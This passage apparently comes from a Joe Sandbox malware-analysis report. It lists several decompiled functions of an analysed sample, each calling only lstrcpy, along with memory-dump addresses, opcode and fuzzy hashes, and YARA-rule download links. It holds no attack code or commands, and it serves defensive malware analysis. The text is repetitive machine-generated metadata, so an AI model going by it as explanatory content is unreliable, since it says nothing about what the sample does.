                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 78db9240e5f4ddf73cbc1efe6de4b93e7c9d1d3bfff3970aa5bb8123d1105e20
                                • Instruction ID: c01efdbd07094d8634b011b6e0e8531fa4202c2188a276675f162f2cf799b4a7
                                • Opcode Fuzzy Hash: 78db9240e5f4ddf73cbc1efe6de4b93e7c9d1d3bfff3970aa5bb8123d1105e20
                                • Instruction Fuzzy Hash: 8381F3B0E402059BDB24DF94EC44BAEB7B5EF84344F18906DE609B7381EB359D45CB91
                                Function 00E61570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00E615A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E615D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E61611
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E61649
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 64e1b2f67a0090c5415d7ce451aade54baf284b5323cad0ad5d53e6b4bc9df32
                                • Instruction ID: 02fa22d88a26b98c9f6816d4850ead1587fe528ae8bf4d648bbeabae14c839f1
                                • Opcode Fuzzy Hash: 64e1b2f67a0090c5415d7ce451aade54baf284b5323cad0ad5d53e6b4bc9df32
                                • Instruction Fuzzy Hash: B22119B4601B029FD735DF2AE458A17B7F4AF88744B48691CA887E7B40DB34F801CBA0
                                Function 00E41530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E41610: lstrcpy.KERNEL32(00000000), ref: 00E4162D
                                  • Part of subcall function 00E41610: lstrcpy.KERNEL32(00000000,?), ref: 00E4164F
                                  • Part of subcall function 00E41610: lstrcpy.KERNEL32(00000000,?), ref: 00E41671
                                  • Part of subcall function 00E41610: lstrcpy.KERNEL32(00000000,?), ref: 00E41693
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 5b4ae74d690a27c3fa93cf9c58b4e6af19f4135d9c9550d7ef6ae68120fa4cad
                                • Instruction ID: dfe80dc79fffb8476a386a6e1eb9a9b31cf082f96e4a4f558d4f8385804b5906
                                • Opcode Fuzzy Hash: 5b4ae74d690a27c3fa93cf9c58b4e6af19f4135d9c9550d7ef6ae68120fa4cad
                                • Instruction Fuzzy Hash: 7A31E774A01B02AFCB24DF3AE588952BBF5FF88304740592DA996D3B10DB34F851CB80
                                Function 00E41610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00E4162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41671
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41693
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: fa0bbcd1c7abdca79cdc22a34c7a177f9a06e4f070d516f17f9d062b19d104ab
                                • Instruction ID: 42a4efc47c98ae6ef91e7d564c2c1dadd2412220c5ab79cf49ffc9720eb9b1a7
                                • Opcode Fuzzy Hash: fa0bbcd1c7abdca79cdc22a34c7a177f9a06e4f070d516f17f9d062b19d104ab
                                • Instruction Fuzzy Hash: 09115274A11B02ABDB249F39F50C927B7F8FF48309749556DA496E3B40EB34E851CB90